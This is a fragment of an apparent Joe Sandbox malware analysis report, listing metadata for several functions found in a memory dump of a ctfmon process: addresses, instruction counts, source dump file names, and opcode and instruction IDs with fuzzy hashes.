                                                                                                                  • Opcode Fuzzy Hash: dacd7fa29f37f9d560091b688c84ea9254209ac305b5f2fd2b93a15646a02054
                                                                                                                  • Instruction Fuzzy Hash: 23C01230A2980E8FDA80BB28C888924BBA0FF0E301BE908E0E00CC71A1D65998908B01
                                                                                                                  Function 00007FFD348A06AD Relevance: .0, Instructions: 13COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction ID: 2499b4f497855eefc6a1a00a3e0b237b2b6b9dd9fe9607a65606e68cca8249bd
                                                                                                                  • Opcode Fuzzy Hash: 179b25b144e2f29aaa3cc3ac54554b8895f9ce9577e118b6f1014ed865f85bc8
                                                                                                                  • Instruction Fuzzy Hash: CEC04C05F5B65B01A9D53B6E58E60ADA1405BC7728FDD1572D74CD0091ACCD20D92277
                                                                                                                  Function 00007FFD348A3CD0 Relevance: .0, Instructions: 10COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0ccc397f1cb7a983c9bfd665e39f639b7cbee496624023b53248f11b89ebbceb
                                                                                                                  • Instruction ID: a92e4db9ab2936683f9e9d1936f12e742ffb2f76d95e84dd0f249778593a6397
                                                                                                                  • Opcode Fuzzy Hash: 0ccc397f1cb7a983c9bfd665e39f639b7cbee496624023b53248f11b89ebbceb
                                                                                                                  • Instruction Fuzzy Hash: AEC08C01F1882A02E369274400311FE08524F51300F541430E00DC33CACF2C2E0102C2
                                                                                                                  Function 00007FFD348A06D0 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction ID: 5c9538717dfbb204b014aa22264d4be7daafa63e35016c887e7dd86aa84dcd2d
                                                                                                                  • Opcode Fuzzy Hash: 27d5eb2966f874ee4979399960ad64d3c4552ba2cf287f4473199d5ec82c46ae
                                                                                                                  • Instruction Fuzzy Hash: 04B01200E6740F00A48437BE08D206470405B47200FC91070D70CC0081A8CD20982363
                                                                                                                  Function 00007FFD348A3A25 Relevance: .0, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000036.00000002.2758302967.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_54_2_7ffd348a0000_ctfmon.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction ID: 9f7ed78d4ab93ff93b1e56f4d5d14cab7e19abe966447f83afdbe8aa09ba3898
                                                                                                                  • Opcode Fuzzy Hash: bcda58ead01f925a8211499ddb2dcfb170daf11e74f7dfb1c5ef012c79b8a96c
                                                                                                                  • Instruction Fuzzy Hash: E6C02B10E0901600E3A4473044601FDB1404F03300F06C071402ED6480DE2C17043340